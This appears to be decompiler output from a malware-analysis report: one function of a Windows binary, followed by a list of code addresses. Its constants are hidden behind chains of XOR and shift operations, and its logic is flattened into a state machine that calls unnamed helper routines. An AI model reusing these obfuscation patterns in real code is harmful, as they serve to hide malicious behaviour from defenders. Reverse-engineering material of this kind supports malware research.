                                                                                                                                                                                      				_v2780 = 0xd8f554;
                                                                                                                                                                                      				_v2780 = _v2780 >> 0xb;
                                                                                                                                                                                      				_v2780 = _v2780 >> 7;
                                                                                                                                                                                      				_v2780 = _v2780 ^ 0x00079072;
                                                                                                                                                                                      				_v2892 = 0x1ce380;
                                                                                                                                                                                      				_v2892 = _v2892 ^ 0x506392b2;
                                                                                                                                                                                      				_v2892 = _v2892 >> 2;
                                                                                                                                                                                      				_v2892 = _v2892 ^ 0xa7f562ec;
                                                                                                                                                                                      				_v2892 = _v2892 ^ 0xb3eeada2;
                                                                                                                                                                                      				_v2748 = 0x4b6045;
                                                                                                                                                                                      				_v2748 = _v2748 | 0xfff2b3bd;
                                                                                                                                                                                      				_v2748 = _v2748 ^ 0xfffe78ab;
                                                                                                                                                                                      				_v2772 = 0x44b019;
                                                                                                                                                                                      				_v2772 = _v2772 << 6;
                                                                                                                                                                                      				_v2772 = _v2772 ^ 0xdf8519b0;
                                                                                                                                                                                      				_v2772 = _v2772 ^ 0xcea55934;
                                                                                                                                                                                      				_v2672 = 0x9de851;
                                                                                                                                                                                      				_v2672 = _v2672 + 0xdaae;
                                                                                                                                                                                      				_v2672 = _v2672 ^ 0x009a5a0c;
                                                                                                                                                                                      				_v2816 = 0xce234;
                                                                                                                                                                                      				_v2816 = _v2816 ^ 0xef3b6bc0;
                                                                                                                                                                                      				_v2816 = _v2816 + 0xb943;
                                                                                                                                                                                      				_v2816 = _v2816 ^ 0xef313dc6;
                                                                                                                                                                                      				_v2644 = 0x831e64;
                                                                                                                                                                                      				_v2644 = _v2644 << 7;
                                                                                                                                                                                      				_v2644 = _v2644 ^ 0x418cd6ce;
                                                                                                                                                                                      				_v2792 = 0xb71d5;
                                                                                                                                                                                      				_v2792 = _v2792 + 0xd0e6;
                                                                                                                                                                                      				_v2792 = _v2792 >> 1;
                                                                                                                                                                                      				_v2792 = _v2792 ^ 0x000ab854;
                                                                                                                                                                                      				_v2800 = 0xbc4add;
                                                                                                                                                                                      				_v2800 = _v2800 >> 4;
                                                                                                                                                                                      				_v2800 = _v2800 >> 4;
                                                                                                                                                                                      				_v2800 = _v2800 ^ 0x000f3ccc;
                                                                                                                                                                                      				_v2860 = 0xc7de55;
                                                                                                                                                                                      				_v2860 = _v2860 >> 8;
                                                                                                                                                                                      				_v2860 = _v2860 >> 3;
                                                                                                                                                                                      				_v2860 = _v2860 + 0xffffb96d;
                                                                                                                                                                                      				_v2860 = _v2860 ^ 0xfff9a10f;
                                                                                                                                                                                      				_v2868 = 0x50e0;
                                                                                                                                                                                      				_v2868 = _v2868 << 0x10;
                                                                                                                                                                                      				_v2868 = _v2868 ^ 0x31c9bada;
                                                                                                                                                                                      				_v2868 = _v2868 << 3;
                                                                                                                                                                                      				_v2868 = _v2868 ^ 0x0945daeb;
                                                                                                                                                                                      				_v2876 = 0x5f8cf7;
                                                                                                                                                                                      				_v2876 = _v2876 ^ 0xc877f21d;
                                                                                                                                                                                      				_v2876 = _v2876 + 0x5049;
                                                                                                                                                                                      				_v2876 = _v2876 ^ 0xb9ce624b;
                                                                                                                                                                                      				_v2876 = _v2876 ^ 0x71e38bc3;
                                                                                                                                                                                      				_v2884 = 0xd45199;
                                                                                                                                                                                      				_v2884 = _v2884 + 0x1b0f;
                                                                                                                                                                                      				_v2884 = _v2884 ^ 0x78878a0d;
                                                                                                                                                                                      				_v2884 = _v2884 >> 0x10;
                                                                                                                                                                                      				_v2884 = _v2884 ^ 0x0002122d;
                                                                                                                                                                                      				_v2784 = 0xb41ca7;
                                                                                                                                                                                      				_v2784 = _v2784 >> 6;
                                                                                                                                                                                      				_v2784 = _v2784 << 5;
                                                                                                                                                                                      				_v2784 = _v2784 ^ 0x005b868a;
                                                                                                                                                                                      				_v2636 = 0x8dae72;
                                                                                                                                                                                      				_v2636 = _v2636 + 0xffffc621;
                                                                                                                                                                                      				_v2636 = _v2636 ^ 0x008635a7;
                                                                                                                                                                                      				_v2664 = 0x1c5bb7;
                                                                                                                                                                                      				_v2664 = _v2664 + 0x2d8a;
                                                                                                                                                                                      				_v2664 = _v2664 ^ 0x0011f5d8;
                                                                                                                                                                                      				_v2760 = 0x485545;
                                                                                                                                                                                      				_t204 =  &_v2760; // 0x485545
                                                                                                                                                                                      				_t795 = 0x2b;
                                                                                                                                                                                      				_v2760 =  *_t204 / _t795;
                                                                                                                                                                                      				_t210 =  &_v2760; // 0x772920e1
                                                                                                                                                                                      				_t796 = 0x33;
                                                                                                                                                                                      				_v2760 =  *_t210 / _t796;
                                                                                                                                                                                      				_v2760 = _v2760 ^ 0x0005bb0a;
                                                                                                                                                                                      				_v2768 = 0x206724;
                                                                                                                                                                                      				_v2768 = _v2768 + 0xbd1f;
                                                                                                                                                                                      				_t797 = 0x66;
                                                                                                                                                                                      				_v2768 = _v2768 * 0x7b;
                                                                                                                                                                                      				_v2768 = _v2768 ^ 0x0fe22bc5;
                                                                                                                                                                                      				_v2776 = 0x718f5a;
                                                                                                                                                                                      				_v2776 = _v2776 * 0x3f;
                                                                                                                                                                                      				_v2776 = _v2776 ^ 0xe004a3c2;
                                                                                                                                                                                      				_v2776 = _v2776 ^ 0xfbf0dedb;
                                                                                                                                                                                      				_v2852 = 0x30668;
                                                                                                                                                                                      				_v2852 = _v2852 / _t797;
                                                                                                                                                                                      				_v2852 = _v2852 * 0x79;
                                                                                                                                                                                      				_t798 = 0x34;
                                                                                                                                                                                      				_v2852 = _v2852 * 0x41;
                                                                                                                                                                                      				_v2852 = _v2852 ^ 0x00e90d43;
                                                                                                                                                                                      				_v2880 = 0xddde8d;
                                                                                                                                                                                      				_v2880 = _v2880 + 0xffff9e4d;
                                                                                                                                                                                      				_v2880 = _v2880 ^ 0x2170423a;
                                                                                                                                                                                      				_v2880 = _v2880 >> 1;
                                                                                                                                                                                      				_v2880 = _v2880 ^ 0x10d47b31;
                                                                                                                                                                                      				_v2764 = 0x8f88ee;
                                                                                                                                                                                      				_v2764 = _v2764 + 0xffff0386;
                                                                                                                                                                                      				_v2764 = _v2764 * 0x4a;
                                                                                                                                                                                      				_v2764 = _v2764 ^ 0x293e38ba;
                                                                                                                                                                                      				_v2932 = 0x1330a6;
                                                                                                                                                                                      				_v2932 = _v2932 << 0x10;
                                                                                                                                                                                      				_v2932 = _v2932 ^ 0x26950d85;
                                                                                                                                                                                      				_v2932 = _v2932 | 0xf53ba417;
                                                                                                                                                                                      				_v2932 = _v2932 ^ 0xf73491db;
                                                                                                                                                                                      				_v2848 = 0x8b68d8;
                                                                                                                                                                                      				_v2848 = _v2848 + 0xffffc5d2;
                                                                                                                                                                                      				_v2848 = _v2848 / _t798;
                                                                                                                                                                                      				_t799 = 0x44;
                                                                                                                                                                                      				_v2848 = _v2848 * 0x12;
                                                                                                                                                                                      				_v2848 = _v2848 ^ 0x00302441;
                                                                                                                                                                                      				_v2796 = 0x487ac0;
                                                                                                                                                                                      				_v2796 = _v2796 >> 2;
                                                                                                                                                                                      				_v2796 = _v2796 << 2;
                                                                                                                                                                                      				_v2796 = _v2796 ^ 0x0044512a;
                                                                                                                                                                                      				_v2788 = 0x814d4e;
                                                                                                                                                                                      				_v2788 = _v2788 << 0xd;
                                                                                                                                                                                      				_v2788 = _v2788 + 0xffffeb04;
                                                                                                                                                                                      				_v2788 = _v2788 ^ 0x29afe2cb;
                                                                                                                                                                                      				_v2648 = 0x81f400;
                                                                                                                                                                                      				_v2648 = _v2648 / _t799;
                                                                                                                                                                                      				_v2648 = _v2648 ^ 0x0007d40f;
                                                                                                                                                                                      				_v2924 = 0x344f86;
                                                                                                                                                                                      				_v2924 = _v2924 * 0x6e;
                                                                                                                                                                                      				_v2924 = _v2924 | 0xa7e46eb9;
                                                                                                                                                                                      				_v2924 = _v2924 << 7;
                                                                                                                                                                                      				_v2924 = _v2924 ^ 0xff3431be;
                                                                                                                                                                                      				_v2696 = 0x5309a4;
                                                                                                                                                                                      				_v2696 = _v2696 + 0xabda;
                                                                                                                                                                                      				_v2696 = _v2696 ^ 0x0057eeeb;
                                                                                                                                                                                      				_v2640 = 0xcd8354;
                                                                                                                                                                                      				_v2640 = _v2640 * 0x30;
                                                                                                                                                                                      				_v2640 = _v2640 ^ 0x268d1ae3;
                                                                                                                                                                                      				_v2736 = 0x8b4c85;
                                                                                                                                                                                      				_v2736 = _v2736 + 0xffffcdbf;
                                                                                                                                                                                      				_v2736 = _v2736 >> 9;
                                                                                                                                                                                      				_v2736 = _v2736 ^ 0x00036e60;
                                                                                                                                                                                      				_v2700 = 0x49adfc;
                                                                                                                                                                                      				_v2700 = _v2700 | 0xa8ad8379;
                                                                                                                                                                                      				_v2700 = _v2700 ^ 0xa8e07f1f;
                                                                                                                                                                                      				_v2836 = 0x26ed3a;
                                                                                                                                                                                      				_v2836 = _v2836 << 4;
                                                                                                                                                                                      				_v2836 = _v2836 ^ 0xdd500379;
                                                                                                                                                                                      				_v2836 = _v2836 ^ 0x075ca1f5;
                                                                                                                                                                                      				_v2836 = _v2836 ^ 0xd8654197;
                                                                                                                                                                                      				_v2864 = 0x88b41;
                                                                                                                                                                                      				_v2864 = _v2864 ^ 0x8a41e3e3;
                                                                                                                                                                                      				_v2864 = _v2864 << 2;
                                                                                                                                                                                      				_v2864 = _v2864 * 0x3d;
                                                                                                                                                                                      				_v2864 = _v2864 ^ 0xcdf16822;
                                                                                                                                                                                      				_v2712 = 0x130ad6;
                                                                                                                                                                                      				_v2712 = _v2712 + 0x26b0;
                                                                                                                                                                                      				_v2712 = _v2712 ^ 0x001463fa;
                                                                                                                                                                                      				_v2912 = 0xf18913;
                                                                                                                                                                                      				_t800 = 0x60;
                                                                                                                                                                                      				_v2912 = _v2912 / _t800;
                                                                                                                                                                                      				_v2912 = _v2912 ^ 0xfb8d6542;
                                                                                                                                                                                      				_v2912 = _v2912 ^ 0x1ef95146;
                                                                                                                                                                                      				_v2912 = _v2912 ^ 0xe575fcb3;
                                                                                                                                                                                      				_v2832 = 0xd4991f;
                                                                                                                                                                                      				_v2832 = _v2832 >> 1;
                                                                                                                                                                                      				_t801 = 0x19;
                                                                                                                                                                                      				_v2832 = _v2832 * 0x39;
                                                                                                                                                                                      				_v2832 = _v2832 + 0x6431;
                                                                                                                                                                                      				_v2832 = _v2832 ^ 0x17a3d9f5;
                                                                                                                                                                                      				_v2840 = 0x943911;
                                                                                                                                                                                      				_v2840 = _v2840 ^ 0xe2670b6e;
                                                                                                                                                                                      				_v2840 = _v2840 + 0x24d4;
                                                                                                                                                                                      				_v2840 = _v2840 << 0xd;
                                                                                                                                                                                      				_v2840 = _v2840 ^ 0x6aeb880a;
                                                                                                                                                                                      				_v2904 = 0xa538e8;
                                                                                                                                                                                      				_v2904 = _v2904 >> 0xc;
                                                                                                                                                                                      				_v2904 = _v2904 ^ 0x62edf37a;
                                                                                                                                                                                      				_v2904 = _v2904 + 0xa832;
                                                                                                                                                                                      				_v2904 = _v2904 ^ 0x62e4cbfc;
                                                                                                                                                                                      				_v2888 = 0x16e2bd;
                                                                                                                                                                                      				_v2888 = _v2888 + 0xffff7f28;
                                                                                                                                                                                      				_v2888 = _v2888 * 0x64;
                                                                                                                                                                                      				_v2888 = _v2888 >> 7;
                                                                                                                                                                                      				_v2888 = _v2888 ^ 0x0018f901;
                                                                                                                                                                                      				_v2656 = 0x3f6e99;
                                                                                                                                                                                      				_v2656 = _v2656 >> 0xb;
                                                                                                                                                                                      				_v2656 = _v2656 ^ 0x0009fe52;
                                                                                                                                                                                      				_v2804 = 0xfa19bd;
                                                                                                                                                                                      				_v2804 = _v2804 / _t801;
                                                                                                                                                                                      				_v2804 = _v2804 << 0xa;
                                                                                                                                                                                      				_v2804 = _v2804 ^ 0x28048f08;
                                                                                                                                                                                      				_v2856 = 0x7adc8b;
                                                                                                                                                                                      				_t802 = 3;
                                                                                                                                                                                      				_v2856 = _v2856 / _t802;
                                                                                                                                                                                      				_v2856 = _v2856 << 0xe;
                                                                                                                                                                                      				_v2856 = _v2856 << 9;
                                                                                                                                                                                      				_v2856 = _v2856 ^ 0x17040ca6;
                                                                                                                                                                                      				_v2896 = 0x5caea7;
                                                                                                                                                                                      				_t803 = 0x48;
                                                                                                                                                                                      				_v2896 = _v2896 / _t803;
                                                                                                                                                                                      				_v2896 = _v2896 + 0xffff6657;
                                                                                                                                                                                      				_v2896 = _v2896 + 0xa67d;
                                                                                                                                                                                      				_v2896 = _v2896 ^ 0x000329ba;
                                                                                                                                                                                      				_v2812 = 0x1fcfbe;
                                                                                                                                                                                      				_v2812 = _v2812 >> 6;
                                                                                                                                                                                      				_t804 = 0x38;
                                                                                                                                                                                      				_v2812 = _v2812 / _t804;
                                                                                                                                                                                      				_v2812 = _v2812 ^ 0x0007b63c;
                                                                                                                                                                                      				_v2720 = 0xe95658;
                                                                                                                                                                                      				_v2720 = _v2720 >> 7;
                                                                                                                                                                                      				_v2720 = _v2720 ^ 0x00071478;
                                                                                                                                                                                      				_v2808 = 0x91ff61;
                                                                                                                                                                                      				_v2808 = _v2808 << 7;
                                                                                                                                                                                      				_v2808 = _v2808 | 0xd2954662;
                                                                                                                                                                                      				_v2808 = _v2808 ^ 0xdaf4ea8a;
                                                                                                                                                                                      				_v2824 = 0x446ad6;
                                                                                                                                                                                      				_v2824 = _v2824 ^ 0x83a91402;
                                                                                                                                                                                      				_t805 = 0x4c;
                                                                                                                                                                                      				_v2824 = _v2824 * 0x45;
                                                                                                                                                                                      				_v2824 = _v2824 >> 0x10;
                                                                                                                                                                                      				_v2824 = _v2824 ^ 0x000353dc;
                                                                                                                                                                                      				_v2708 = 0x4b7422;
                                                                                                                                                                                      				_v2708 = _v2708 >> 3;
                                                                                                                                                                                      				_v2708 = _v2708 ^ 0x0008e5f0;
                                                                                                                                                                                      				_v2844 = 0xac34a;
                                                                                                                                                                                      				_v2844 = _v2844 * 0xd;
                                                                                                                                                                                      				_v2844 = _v2844 * 0x1a;
                                                                                                                                                                                      				_v2844 = _v2844 >> 0x10;
                                                                                                                                                                                      				_v2844 = _v2844 ^ 0x0002a3d0;
                                                                                                                                                                                      				_v2716 = 0x7960bf;
                                                                                                                                                                                      				_v2716 = _v2716 + 0xffffc462;
                                                                                                                                                                                      				_v2716 = _v2716 ^ 0x007665d3;
                                                                                                                                                                                      				_v2744 = 0xbebd75;
                                                                                                                                                                                      				_v2744 = _v2744 ^ 0x7a1f8fc9;
                                                                                                                                                                                      				_v2744 = _v2744 / _t805;
                                                                                                                                                                                      				_v2744 = _v2744 ^ 0x0198bdde;
                                                                                                                                                                                      				_v2752 = 0x962c9a;
                                                                                                                                                                                      				_v2752 = _v2752 + 0xfffffa67;
                                                                                                                                                                                      				_t806 = 0x2e;
                                                                                                                                                                                      				_v2752 = _v2752 / _t806;
                                                                                                                                                                                      				_v2752 = _v2752 ^ 0x00030d52;
                                                                                                                                                                                      				_v2920 = 0x9dfed8;
                                                                                                                                                                                      				_v2920 = _v2920 ^ 0x0302cebd;
                                                                                                                                                                                      				_v2920 = _v2920 + 0x73d2;
                                                                                                                                                                                      				_v2920 = _v2920 >> 0xf;
                                                                                                                                                                                      				_v2920 = _v2920 ^ 0x000ba8ee;
                                                                                                                                                                                      				_v2872 = 0x884e2b;
                                                                                                                                                                                      				_v2872 = _v2872 | 0x5783eec3;
                                                                                                                                                                                      				_v2872 = _v2872 << 7;
                                                                                                                                                                                      				_v2872 = _v2872 + 0x1dcf;
                                                                                                                                                                                      				_v2872 = _v2872 ^ 0xc5fa8f40;
                                                                                                                                                                                      				_v2668 = 0x393d56;
                                                                                                                                                                                      				_v2668 = _v2668 >> 6;
                                                                                                                                                                                      				_v2668 = _v2668 ^ 0x0000ab92;
                                                                                                                                                                                      				_v2704 = 0x58f1e9;
                                                                                                                                                                                      				_t807 = 0x7c;
                                                                                                                                                                                      				_v2704 = _v2704 / _t807;
                                                                                                                                                                                      				_v2704 = _v2704 ^ 0x00048cf6;
                                                                                                                                                                                      				_v2820 = 0x3ec6d0;
                                                                                                                                                                                      				_v2820 = _v2820 + 0x5fc5;
                                                                                                                                                                                      				_t808 = 0x21;
                                                                                                                                                                                      				_v2820 = _v2820 / _t808;
                                                                                                                                                                                      				_v2820 = _v2820 ^ 0xd86d8e19;
                                                                                                                                                                                      				_v2820 = _v2820 ^ 0xd8634d78;
                                                                                                                                                                                      				_v2828 = 0xe4a70b;
                                                                                                                                                                                      				_v2828 = _v2828 ^ 0x2abc0881;
                                                                                                                                                                                      				_v2828 = _v2828 ^ 0xa79f6464;
                                                                                                                                                                                      				_v2828 = _v2828 >> 0xf;
                                                                                                                                                                                      				_v2828 = _v2828 ^ 0x000c3a60;
                                                                                                                                                                                      				_v2684 = 0x315a2d;
                                                                                                                                                                                      				_v2684 = _v2684 | 0xacf80d9c;
                                                                                                                                                                                      				_v2684 = _v2684 ^ 0xacfa1597;
                                                                                                                                                                                      				_v2692 = 0x63e424;
                                                                                                                                                                                      				_v2692 = _v2692 + 0x44ad;
                                                                                                                                                                                      				_v2692 = _v2692 ^ 0x0068b9d0;
                                                                                                                                                                                      				_v2724 = 0xdbaa4f;
                                                                                                                                                                                      				_v2724 = _v2724 + 0xffffd825;
                                                                                                                                                                                      				_v2724 = _v2724 ^ 0x00d800e8;
                                                                                                                                                                                      				_v2728 = 0xc5e7f7;
                                                                                                                                                                                      				_v2728 = _v2728 << 0xf;
                                                                                                                                                                                      				_v2728 = _v2728 << 0xd;
                                                                                                                                                                                      				_v2728 = _v2728 ^ 0x7003c940;
                                                                                                                                                                                      				_v2676 = 0x7098dc;
                                                                                                                                                                                      				_v2676 = _v2676 ^ 0x810ef473;
                                                                                                                                                                                      				_v2676 = _v2676 ^ 0x817bc99c;
                                                                                                                                                                                      				_t755 = E003DADFC();
                                                                                                                                                                                      				_t876 = _v2724;
                                                                                                                                                                                      				_t791 = _t755;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_t756 = 0x32a72b9;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L2:
                                                                                                                                                                                      							_t887 = _t877 - 0x99d8a48;
                                                                                                                                                                                      							if(_t887 > 0) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_t887 == 0) {
                                                                                                                                                                                      								_push(_t809);
                                                                                                                                                                                      								_t809 = _v2756;
                                                                                                                                                                                      								E003DE259(_t809, _v2660, _v2900, _v2688, _t809, _t809,  &_v1564, _v2908, _v2916);
                                                                                                                                                                                      								_t883 =  &(_t883[8]);
                                                                                                                                                                                      								_t877 = 0xe471d7b;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L1:
                                                                                                                                                                                      									_t756 = 0x32a72b9;
                                                                                                                                                                                      									goto L2;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								if(_t877 == 0xe4882e) {
                                                                                                                                                                                      									_v2620 = E003D3789();
                                                                                                                                                                                      									_t779 = E003DF14F(_v2932, _t778, _v2848, _v2796);
                                                                                                                                                                                      									_pop(_t812);
                                                                                                                                                                                      									_v2616 = 2 + _t779 * 2;
                                                                                                                                                                                      									_t809 = _v2788;
                                                                                                                                                                                      									_t773 = E003E8727(_t809,  &_v2624, _v2648, _t791, _v2924, _v2732, _v2696, _t791, _t812, _t791, _v2640);
                                                                                                                                                                                      									_t883 =  &(_t883[0xa]);
                                                                                                                                                                                      									__eflags = _t773;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										_t877 = 0xc8e8e82;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											L1:
                                                                                                                                                                                      											_t756 = 0x32a72b9;
                                                                                                                                                                                      											goto L2;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									if(_t877 == _t756) {
                                                                                                                                                                                      										_push(0x3d12a0);
                                                                                                                                                                                      										E003D8C65(_v2888, __eflags,  &_v2604,  &_v1564, _v2656, _t876, _v2804, E003F0AD3(_v2840, _v2904, __eflags), _v2856,  &_v524, _v2896, _v2812);
                                                                                                                                                                                      										_t809 = _v2720;
                                                                                                                                                                                      										E003E2EED(_t809, _v2808, _v2824, _t782);
                                                                                                                                                                                      										_t883 =  &(_t883[0xc]);
                                                                                                                                                                                      										_t877 = 0xca1945b;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											L1:
                                                                                                                                                                                      											_t756 = 0x32a72b9;
                                                                                                                                                                                      											goto L2;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										if(_t877 == 0x3352d63) {
                                                                                                                                                                                      											_t809 = _v2864;
                                                                                                                                                                                      											_t788 = E003D7739(_t809, _v2712, _v2632, _v2912, _v2628, _v2832);
                                                                                                                                                                                      											_t876 = _t788;
                                                                                                                                                                                      											_t883 =  &(_t883[4]);
                                                                                                                                                                                      											__eflags = _t788;
                                                                                                                                                                                      											_t756 = 0x32a72b9;
                                                                                                                                                                                      											_t877 =  !=  ? 0x32a72b9 : 0xc5894d6;
                                                                                                                                                                                      											continue;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t877 == 0x5779399) {
                                                                                                                                                                                      												return E003E9038(_v2724, _v2728, _v2624, _v2676);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if(_t877 != 0x58d7aaf) {
                                                                                                                                                                                      												goto L24;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t809 = _v2920;
                                                                                                                                                                                      												E003DF699(_t809, _t876, _v2872, _v2668, _v2704);
                                                                                                                                                                                      												_t883 =  &(_t883[3]);
                                                                                                                                                                                      												_t877 = 0xc5894d6;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L1:
                                                                                                                                                                                      													_t756 = 0x32a72b9;
                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L28:
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L27:
                                                                                                                                                                                      							return _t773;
                                                                                                                                                                                      							goto L28;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t877 - 0xc5894d6;
                                                                                                                                                                                      						if(_t877 == 0xc5894d6) {
                                                                                                                                                                                      							_t809 = _v2820;
                                                                                                                                                                                      							E003DF699(_t809, _v2632, _v2828, _v2684, _v2692);
                                                                                                                                                                                      							_t883 =  &(_t883[3]);
                                                                                                                                                                                      							_t877 = 0x5779399;
                                                                                                                                                                                      							_t756 = 0x32a72b9;
                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							__eflags = _t877 - 0xc8e8e82;
                                                                                                                                                                                      							if(_t877 == 0xc8e8e82) {
                                                                                                                                                                                      								_t809 = _v2736;
                                                                                                                                                                                      								E003E7EDD( &_v2624, _v2700,  &_v2632, _v2836);
                                                                                                                                                                                      								_t883 =  &(_t883[3]);
                                                                                                                                                                                      								asm("sbb esi, esi");
                                                                                                                                                                                      								_t877 = (_t877 & 0xfdbd99ca) + 0x5779399;
                                                                                                                                                                                      								goto L1;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eflags = _t877 - 0xca1945b;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									_push(_v2752);
                                                                                                                                                                                      									_push( &_v524);
                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                      									_push(_v2744);
                                                                                                                                                                                      									_push(_v2716);
                                                                                                                                                                                      									_push(_v2844);
                                                                                                                                                                                      									_push(1);
                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                      									E003F06EF(_v2708, __eflags);
                                                                                                                                                                                      									_t883 =  &(_t883[8]);
                                                                                                                                                                                      									_t877 = 0x58d7aaf;
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										L1:
                                                                                                                                                                                      										_t756 = 0x32a72b9;
                                                                                                                                                                                      										goto L2;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									__eflags = _t877 - 0xe471d7b;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										goto L24;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										E003D24AA(_t809, _v2652, __eflags,  &_v2084, _v2680, _v2740, _v2780);
                                                                                                                                                                                      										_t766 = E003E0F17(_v2892, _v2748,  &_v2084, _v2772, _v2672);
                                                                                                                                                                                      										_t884 =  &(_t883[7]);
                                                                                                                                                                                      										 *_t766 = 0;
                                                                                                                                                                                      										E003ECC3F(_v2816,  &_v1044, __eflags, _v2644);
                                                                                                                                                                                      										 *_t884 = 0x3d11b0;
                                                                                                                                                                                      										E003F06A6(__eflags,  &_v2084, _v2860, E003F0AD3(_v2792, _v2800, __eflags), _v2868, _v2876,  &_v2604, _v2884);
                                                                                                                                                                                      										E003E2EED(_v2784, _v2636, _v2664, _t768);
                                                                                                                                                                                      										_t809 =  &_v2604;
                                                                                                                                                                                      										_t773 = E003F3306(_t809, _v2760, _v2768, _v2776, _t882, _v2852);
                                                                                                                                                                                      										_t883 =  &(_t884[0xd]);
                                                                                                                                                                                      										__eflags = _t773;
                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                      											_t877 = 0xe4882e;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L1:
                                                                                                                                                                                      												_t756 = 0x32a72b9;
                                                                                                                                                                                      												goto L2;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                      						L24:
                                                                                                                                                                                      						__eflags = _t877 - 0x51bfa3f;
                                                                                                                                                                                      					} while (__eflags != 0);
                                                                                                                                                                                      					return _t756;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}
























































































































                                                                                                                                                                                      0x003e1c12
                                                                                                                                                                                      0x003e1c18
                                                                                                                                                                                      0x003e1c22
                                                                                                                                                                                      0x003e1c2d
                                                                                                                                                                                      0x003e1c38
                                                                                                                                                                                      0x003e1c40
                                                                                                                                                                                      0x003e1c4b
                                                                                                                                                                                      0x003e1c56
                                                                                                                                                                                      0x003e1c61
                                                                                                                                                                                      0x003e1c6c
                                                                                                                                                                                      0x003e1c74
                                                                                                                                                                                      0x003e1c7c
                                                                                                                                                                                      0x003e1c84
                                                                                                                                                                                      0x003e1c8c
                                                                                                                                                                                      0x003e1c94
                                                                                                                                                                                      0x003e1cac
                                                                                                                                                                                      0x003e1cae
                                                                                                                                                                                      0x003e1cb3
                                                                                                                                                                                      0x003e1cb8
                                                                                                                                                                                      0x003e1cbf
                                                                                                                                                                                      0x003e1cca
                                                                                                                                                                                      0x003e1cd5
                                                                                                                                                                                      0x003e1cdd
                                                                                                                                                                                      0x003e1ce9
                                                                                                                                                                                      0x003e1ced
                                                                                                                                                                                      0x003e1cf5
                                                                                                                                                                                      0x003e1cfd
                                                                                                                                                                                      0x003e1d08
                                                                                                                                                                                      0x003e1d13
                                                                                                                                                                                      0x003e1d1e
                                                                                                                                                                                      0x003e1d26
                                                                                                                                                                                      0x003e1d2e
                                                                                                                                                                                      0x003e1d3e
                                                                                                                                                                                      0x003e1d42
                                                                                                                                                                                      0x003e1d4a
                                                                                                                                                                                      0x003e1d52
                                                                                                                                                                                      0x003e1d57
                                                                                                                                                                                      0x003e1d5f
                                                                                                                                                                                      0x003e1d67
                                                                                                                                                                                      0x003e1d6f
                                                                                                                                                                                      0x003e1d82
                                                                                                                                                                                      0x003e1d83
                                                                                                                                                                                      0x003e1d8a
                                                                                                                                                                                      0x003e1d95
                                                                                                                                                                                      0x003e1da9
                                                                                                                                                                                      0x003e1db0
                                                                                                                                                                                      0x003e1dbb
                                                                                                                                                                                      0x003e1dc6
                                                                                                                                                                                      0x003e1dd1
                                                                                                                                                                                      0x003e1ddc
                                                                                                                                                                                      0x003e1de7
                                                                                                                                                                                      0x003e1df2
                                                                                                                                                                                      0x003e1dfa
                                                                                                                                                                                      0x003e1e02
                                                                                                                                                                                      0x003e1e0d
                                                                                                                                                                                      0x003e1e15
                                                                                                                                                                                      0x003e1e1d
                                                                                                                                                                                      0x003e1e22
                                                                                                                                                                                      0x003e1e2a
                                                                                                                                                                                      0x003e1e32
                                                                                                                                                                                      0x003e1e3d
                                                                                                                                                                                      0x003e1e48
                                                                                                                                                                                      0x003e1e53
                                                                                                                                                                                      0x003e1e5e
                                                                                                                                                                                      0x003e1e66
                                                                                                                                                                                      0x003e1e71
                                                                                                                                                                                      0x003e1e7e
                                                                                                                                                                                      0x003e1e89
                                                                                                                                                                                      0x003e1e94
                                                                                                                                                                                      0x003e1e9f
                                                                                                                                                                                      0x003e1eaa
                                                                                                                                                                                      0x003e1eb5
                                                                                                                                                                                      0x003e1ec0
                                                                                                                                                                                      0x003e1ecb
                                                                                                                                                                                      0x003e1ed6
                                                                                                                                                                                      0x003e1ede
                                                                                                                                                                                      0x003e1ee9
                                                                                                                                                                                      0x003e1ef4
                                                                                                                                                                                      0x003e1eff
                                                                                                                                                                                      0x003e1f06
                                                                                                                                                                                      0x003e1f11
                                                                                                                                                                                      0x003e1f1c
                                                                                                                                                                                      0x003e1f24
                                                                                                                                                                                      0x003e1f2c
                                                                                                                                                                                      0x003e1f37
                                                                                                                                                                                      0x003e1f3f
                                                                                                                                                                                      0x003e1f44
                                                                                                                                                                                      0x003e1f49
                                                                                                                                                                                      0x003e1f51
                                                                                                                                                                                      0x003e1f59
                                                                                                                                                                                      0x003e1f61
